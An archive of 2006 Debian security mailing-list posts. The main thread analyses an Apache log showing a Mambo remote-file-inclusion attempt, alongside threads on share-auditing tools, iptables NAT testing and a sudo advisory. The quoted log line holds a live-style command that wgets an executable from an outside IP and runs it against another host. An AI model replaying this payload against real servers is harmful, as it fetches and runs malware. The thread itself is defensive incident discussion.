Re: Security scanner
Jaroslaw Tabor <[EMAIL PROTECTED]> wrote: >Has anyone know a network scanner I can run on Debian to search LAN for > unprotected windows shares ? Or maybe something looking for simple > passwords ? I'd like to automate discovering stupid users, leaving full > access to their C:\. Package: smb-nat Priority: extra Section: admin Installed-Size: 192 Maintainer: Javier Fernandez-Sanguino Pen~a <[EMAIL PROTECTED]> Description: Netbios Auditing Tool This tool can perform various security checks on remote servers running NetBIOS file sharing services. It is capable of enumerating shares and make break-in attempts using a (user-provided) list of users and passwords. Greetings Bernd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Security scanner
On 1/23/06, Jaroslaw Tabor <[EMAIL PROTECTED]> wrote: > Hi all! > > Has anyone know a network scanner I can run on Debian to search LAN > for > unprotected windows shares ? Look into Nessus. (http://www.nessus.org/) > Or maybe something looking for simple > passwords ? Look into John the Ripper (http://www.openwall.com/john/) > I'd like to automate discovering stupid users, leaving full > access to their C:\. ...I still wouldn't let them have full access to the root drive. Leaves for too many openings for malware (ad/spyware, viruses, worms) to go crazy on your systems. Stupid users are assumed, stupid admins are another thing all together. ~Daniel
Re: Security scanner
On Tue, 24 Jan 2006, Jaroslaw Tabor wrote: > Hi all! > > Has anyone know a network scanner I can run on Debian to search you can use the debian package "gnomba" to easily browse through all the windows shares that are available on your local network... very straightforward to use! kind regards, danny. > LAN for unprotected windows shares ? Or maybe something looking for > simple passwords ? I'd like to automate discovering stupid users, > leaving full access to their C:\. - A pessimist is a decently informed optimist. - mail: decockd:at:esat:dot:kuleuven:dot:be http://godot.be godot:at:advalvas:dot:be http://godot.studentenweb.org godot:at:godot:dot:be web: http://www.esat.kuleuven.be/~decockd -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Security scanner
Hi all! Has anyone know a network scanner I can run on Debian to search LAN for unprotected windows shares ? Or maybe something looking for simple passwords ? I'd like to automate discovering stupid users, leaving full access to their C:\. -- Jaroslaw Tabor <[EMAIL PROTECTED]> -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Strange Apache log and mambo security - sexy executable
Life is only probabilities...isn't it? A quick link for an overview: http://en.wikipedia.org/wiki/Referer_spam There are blacklists elsewhere, some updated every 15 minutes. On Mon, January 23, 2006 8:58 am, Christoph Ulrich Scholler said: > Hi, > > On 23.01. 07:46, Jose Marrero wrote: >> Apache configured with mod_rewrite to deny blank or fake referers is a >> good idea. > > How can you tell that a referrer is fake? > > Regards, > > uLI > > > -- > To UNSUBSCRIBE, email to [EMAIL PROTECTED] > with a subject of "unsubscribe". Trouble? Contact > [EMAIL PROTECTED] > -- -JM. Estos días azules y este sol de la infancia (Antonio Machado-1939) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Strange Apache log and mambo security - sexy executable
Hi, On 23.01. 07:46, Jose Marrero wrote: > Apache configured with mod_rewrite to deny blank or fake referers is a > good idea. How can you tell that a referrer is fake? Regards, uLI -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Strange Apache log and mambo security - sexy executable
Just a couple of things: Apache configured with mod_rewrite to deny blank or fake referers is a good idea. Do you have apache configured with mod_security? I highly recommend this last one since you run an php based CMS and can protect from exploits not yet discovered. On Mon, January 23, 2006 2:32 am, Maik Holtkamp said: > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > Edward Shornock schrieb: >> > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote: >> > Hi, >> > >> > yesterday morning I found a strange entry in my apache log files >> (debian >> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan >> > Server, just serving my Family and some good friends (normally). >> > >> > ---cut--- >> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET >> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20 >> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo| >> > HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT >> 5.1;)" >> > ---cut--- >> > >> > As I patched mambo against recent "register global" attack and my /tmp >> > is mount noexec, the attack doesn't exploit anything. >> > >> > However, I curiously downloaded this sexy executable to have a closer >> look. >> > >> > ---cut--- >> > backup:/home/qmb# ./sexy -h >> > ./sexy >> > ---cut--- >> > >> Never run apps like this as root. Bad bad idea. > > There is an old saying in Germany: > > "Only damage will make you wise" Funny, Don Quixote (when in a good mood) used to say, "Sancho, why experience always comes when is not needed?"* *I am just paraphrasing... -- -JM. Estos días azules y este sol de la infancia (Antonio Machado-1939) -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Simple symmetric NAT Setup using IPTABLES
Hello every one. I am having problem in setting up symmetric NAT using IPTABLES Actually I am working on SIP application. SIP has the problem on NATes networks. STUN is one of the solutions. I have embedded STUN client functionality inside SIP application. Now i have to test the application. There are four scenerios of NATed network: The following chart shows combinations of NATs at each endpoint with the current NAT type definitions in STUN. The combinations are classified into 4 groups: Class I, II, III and IV. +--+-+-+-+-+-+ |\ EP-R| | | | | | | |Open | F | P | PR | SYM | |EP-S \| | | | | | |--+-+-+-+-+-+ | Open | | | | |--+ | | | | F| | |(III)| |--+( I )| ( II ) | | | P| | | | |--+ | +-+ | PR | | | | |--+ | +-+ | | SYM | | | (IV) | +--+-+---+ Note: EP-S: Sending endpoint. EP-R: Receiving endpoint. (In full-duplex, both EP-a and EP-b in Figure 3.1 will have both EP-S and EP-R) Open: Open to public network (no NAT) F : Full-cone NAT R : Restricted-cone NAT PR : Port restricted-cone NAT For setting up a test environment, I decided to setup as below: 192.168.0.2 +--+ | ClientA | +--+ | | | eth1 eth0 | 192.168.0.1 | 172.25.25.41 +-|-+ | NAT1| +-|-+ | | | 172.25.25.42| +---+ |Proxy\Registrar,STUN Server| +---+ | | eth1eth0 | 10.0.0.1 |172.25.25.43 | +-|-+ | NAT2| +-|-+ | | | | 10.0.0.2 +--+ | ClientB | +--+ 172.25.25.X LAN (External Network for client A and B) 192.168.0.X Private Network 1 (Internal Network for Client A) 10.0.0.X Private Network 2 (Internal Network for Client B) ClientA and ClientB are sip clients with STUN functionality embedded. NAT1 and NAT2 are internal LAN NAT. I mean for testing purpose, i have used two machines with two network cards. below is the configuration of NAT1 using iptables. Also I am configuring it for UDP protocol as SIP application is using UDP for both signaling and media streaming. > iptables -A PREROUTING -t nat -d 172.25.25.41 -i eth0 -j DNAT --to 192.168.0.2 This tells NAT1 to change the destination of the packet recieved on eth0 to clientA address whenever the destination is eth0 (172.25.25.41) > iptables -A FORWARD -d 192.168.0.2 -j ACCEPT > iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT For forwarding the packets from eth1 and to remember its state > iptables -A POSTROUTING -t nat -p udp -s 192.168.0.2 -o eth0 -j SNAT --to > 172.25.25.41:7070-7074 to change the source address of the packet to a pool of address before routing to eth0. My intention was to make it symmetric. > echo "1" > /proc/sys/net/ipv4/ip_forward to set the ip_forward table ON The above commands I used for making NAT1 symmetric, For making it port restricted, I change the POSTROUTING command above and make it like this: > iptables -A POSTROUTING -t nat -p udp -s 192.168.0.2 -o eth0 -j SNAT --to > 172.25.25.41:8080 Here NAT1 will change the source address of ClientA packets to same address for routing. I am using it for testing purpose so it will work as long as only one client exists in Private Network 1. For making NAT1 restricted, I change the above POSTROUTING command and make it like this: > iptables -A POSTROUTING -t nat -p udp -s 192.168.0.2 -o eth0 -j SNAT --to > 172.25.25.41 For making it FULL CONE NAT, i have to think about it. So what I want is a test environment for my SIP application. I can't use application Gateway, as only NAT will work here because after testing here, i will try to test it on some real environment. I wants IPTABLE commands that can do the above task. Please suggest some thing if you have some better option in your mind. Like If there is some application that can setup NAT as mentioned above or if I can test my application on some public STUN and proxy servers on the Internet. ALso, if you think this can be performed by some utility on some different OS like Windows, pleass suggest me. regards, Asif
Re: Security implications of allowing init to re-exec from another path
For the record, we didn't add this feature. The person who requested it found that he could bind-mount a different executable over /sbin/init instead. -- Thomas Hood -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Strange Apache log and mambo security - sexy executable
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Edward Shornock schrieb: > > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote: > > Hi, > > > > yesterday morning I found a strange entry in my apache log files (debian > > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan > > Server, just serving my Family and some good friends (normally). > > > > ---cut--- > > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET > > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20 > > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo| > > HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" > > ---cut--- > > > > As I patched mambo against recent "register global" attack and my /tmp > > is mount noexec, the attack doesn't exploit anything. > > > > However, I curiously downloaded this sexy executable to have a closer look. > > > > ---cut--- > > backup:/home/qmb# ./sexy -h > > ./sexy > > ---cut--- > > > Never run apps like this as root. Bad bad idea. There is an old saying in Germany: "Only damage will make you wise" In spite the box where I tried was on the second line and I did not pass any arguments (IP/port) to the tool, I see the chance that it would have polluted the whole LAN and probably even find a way to the outside, now. Thanks god it wasn't that evil, so the knoppix restore could fix the situation. > If you want more information about this tool, google for "Linux.RST.B" > or "Unix/RST.B". Thank you very much. - -- - - maik -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFD1LDZz3bq6aadmI8RAj/fAJ93fsZEUSRiPNRGUqs7Q7t6pDOF8wCeK1Tn LzAJkhxI+Kfs5njhvwZ/Xio= =3tRt -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Strange Apache log and mambo security - sexy executable
Oops...didn't trim enough of the response and curiosity made me research this. According to the sophos site: --cut-- Linux/Rst-B will attempt to infect all ELF executables in the current working directory and the directory /bin If Linux/Rst-B is executed by a privileged user then it may attempt to create a backdoor on the system. This is achieved by opening a socket and listening for a particular packet containing details about the origin of the attacker and the command the attacker would like to execute on the system. --end-- I'd reinstall since you ran this executable on your system as root. Who knows what the full extent of the damaged caused is... signature.asc Description: Digital signature
Re: Strange Apache log and mambo security - sexy executable
On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Hi,
>
> yesterday morning I found a strange entry in my apache log files (debian
> sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
> Server, just serving my Family and some good friends (normally).
>
> - ---cut---
> 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
> 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
> HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> - ---cut---
>
> As I patched mambo against recent "register global" attack and my /tmp
> is mount noexec, the attack doesn't exploit anything.
>
> However, I curiously downloaded this sexy executable to have a closer look.
>
> - ---cut---
> backup:/home/qmb# ./sexy -h
> ./sexy
> - ---cut---
Never run apps like this as root. Bad bad idea.
If you want more information about this tool, google for "Linux.RST.B"
or "Unix/RST.B".
cut---
$ f-prot sexy
Virus scanning report - 23 January 2006 @ 4:21
F-PROT ANTIVIRUS
Program version: 4.6.5
Engine version: 3.16.13
VIRUS SIGNATURE FILES
SIGN.DEF created 13 January 2006
SIGN2.DEF created 13 January 2006
MACRO.DEF created 13 January 2006
Search: sexy
Action: Report only
Files: "Dumb" scan of all files
Switches: -ARCHIVE -PACKED -SERVER
/tmp/sexy Infection: Unix/RST.B
Results of virus scanning:
Files: 1
MBRs: 0
Boot sectors: 0
Objects scanned: 1
Infected: 1
Suspicious: 0
Disinfected: 0
Deleted: 0
Renamed: 0
Time: 0:00
--end--
--cut--
$ clamscan sexy
sexy: Linux.RST.B FOUND
--- SCAN SUMMARY ---
Known viruses: 35671
Engine version: 0.88
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.01 MB
Time: 0.903 sec (0 m 0 s)
--end--
>
> This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
> used to make rsync backups of LAN hosts to usb hds.
>
> Unfortunately, I was that curious, that I decided to strace it (in spite
> I hardly understand strace):
>
> - ---cut---
> backup:/home/qmb# strace ./sexy
> execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
> uname({sys="Linux", node="backup", ...}) = 0
> brk(0) = 0x804a000
> old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
> - -1, 0) = 0xb7f13000
> access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or
> directory)
> open("/etc/ld.so.preload", O_RDONLY)= -1 ENOENT (No such file or
> directory)
> open("/etc/ld.so.cache", O_RDONLY) = 3
> fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
> old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
> close(3)= 0
> access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or
> directory)
> open("/lib/tls/libc.so.6", O_RDONLY)= 3
> read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
> 512) = 512
> fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
> old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xb7dd6000
> old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED,
> 3, 0x129000) = 0xb7f0
> old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
> MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
> close(3)= 0
> old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
> - -1, 0) = 0xb7dd5000
> set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
> limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
> limit_in_pages:1, seg_not_present:0, useable:1}) = 0
> munmap(0xb7f0b000, 30780) = 0
> fork() = 11935
> fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
> mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
> 0) = 0xb7f12000
> write(1, "./sexy \n", 21./sexy
> ) = 21
> munmap(0xb7f12000, 4096)= 0
> exit_group(2) = ?
> - ---cut---
>
> After this run the box was hardly damaged:
>
> - - It insists on bringing its NIC to promiscuous mode
> - - ls, grep, gunzip (probably others, too) just give a segmentation
> fault
>
> I tried to investigate further:
>
> - - tcpdump doesn't show any traffic in the net that shouldn't be there
> - - ps ax listed only known processes, all where found in /proc, too
> - - Top doesn't show anything strange
> - - netstat -tulpen doesn't list any ports listening
>
> Trying rebooting failed totally. It tried to run a lot of grep processes
> that didn't run etc.
>
> It took me 2 hours to return to a normal state with this box (booting
> knoppix, backup of corrupted /var, blanking the disc, restoring the
> backup of the night before).
>
> In spite I am not that familiar with str
Re: [SECURITY] [DSA 946-1] New sudo packages fix privilege escalation
Le vendredi 20 janvier 2006 à 11:24 +0100, Martin Schulze a écrit : > This update alters the former behaviour of sudo and limits the number > of supported environment variables to LC_*, LANG, LANGUAGE and TERM. > Additional variables are only passed through when set as env_check in > /etc/sudoers, which might be required for some scripts to continue to > work. How about the XAUTHORITY environment variable ? Isn't it necessary to run X11 applications? Regards, -- .''`. Josselin Mouette/\./\ : :' : [EMAIL PROTECTED] `. `'[EMAIL PROTECTED] `- Debian GNU/Linux -- The power of freedom
Re: Strange Apache log and mambo security - sexy executable
--On January 23, 2006 8:31:40 AM +0100 Maik Holtkamp
<[EMAIL PROTECTED]> wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hi,
yesterday morning I found a strange entry in my apache log files (debian
sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
Server, just serving my Family and some good friends (normally).
- ---cut---
132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&
mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%
20212.20
3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20
YYY;echo| HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1;)" - ---cut---
As I patched mambo against recent "register global" attack and my /tmp
is mount noexec, the attack doesn't exploit anything.
However, I curiously downloaded this sexy executable to have a closer
look.
- ---cut---
backup:/home/qmb# ./sexy -h
./sexy
- ---cut---
Firstly, don't ever download and run untrusted code as root, especially
when it's obviously an exploit attempt, unless you run it on an unconnected
box you're prepared to scrap afterwards. God knows what the code will do
to your system.
This host backup (sarge, 2.6.12) is in the second raw of my LAN and just
used to make rsync backups of LAN hosts to usb hds.
Unfortunately, I was that curious, that I decided to strace it (in spite
I hardly understand strace):
- ---cut---
backup:/home/qmb# strace ./sexy
execve("./sexy", ["./sexy"], [/* 20 vars */]) = 0
uname({sys="Linux", node="backup", ...}) = 0
brk(0) = 0x804a000
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7f13000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or
directory)
open("/etc/ld.so.preload", O_RDONLY)= -1 ENOENT (No such file or
directory)
open("/etc/ld.so.cache", O_RDONLY) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=30780, ...}) = 0
old_mmap(NULL, 30780, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7f0b000
close(3)= 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or
directory)
open("/lib/tls/libc.so.6", O_RDONLY)= 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0`Z\1\000"...,
512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1254468, ...}) = 0
old_mmap(NULL, 1264780, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xb7dd6000 old_mmap(0xb7f0, 36864, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED, 3, 0x129000) = 0xb7f0
old_mmap(0xb7f09000, 7308, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f09000
close(3)= 0
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS,
- -1, 0) = 0xb7dd5000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dd5460,
limit:1048575, seg_32bit:1, contents:0, read_exec_only:0,
limit_in_pages:1, seg_not_present:0, useable:1}) = 0
munmap(0xb7f0b000, 30780) = 0
fork() = 11935
fstat64(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1,
0) = 0xb7f12000
write(1, "./sexy \n", 21./sexy
) = 21
munmap(0xb7f12000, 4096)= 0
exit_group(2) = ?
- ---cut---
After this run the box was hardly damaged:
- - It insists on bringing its NIC to promiscuous mode
- - ls, grep, gunzip (probably others, too) just give a segmentation
fault
I tried to investigate further:
- - tcpdump doesn't show any traffic in the net that shouldn't be there
- - ps ax listed only known processes, all where found in /proc, too
- - Top doesn't show anything strange
- - netstat -tulpen doesn't list any ports listening
Trying rebooting failed totally. It tried to run a lot of grep processes
that didn't run etc.
It took me 2 hours to return to a normal state with this box (booting
knoppix, backup of corrupted /var, blanking the disc, restoring the
backup of the night before).
In spite I am not that familiar with strace and no coder, I suppose that
the program "sexy" damaged the linker (open ld.so.cache) and would have
tried to open a ptty on the IP/port given on the command line (As I did
not give any command line arguments, this failed). Probably the guy/bot
on the other end would have exchanged some libs in this session to
install the real rootkit on the box.
Right?
Not having the binary and not really having time to look at it, it's
probably just straight up attempting to infect your machine, and that it
very clearly succeeded in doing. It didn't however succeed in hiding
itself, as evidenced by your segfaults. You're probably running a litle
different target OS than 'sexy' was built for.
Though I already invested some time (restoring the host backup), I would
be pleased to understand what happened more detailed so any clue is
appreciated.
If somebody
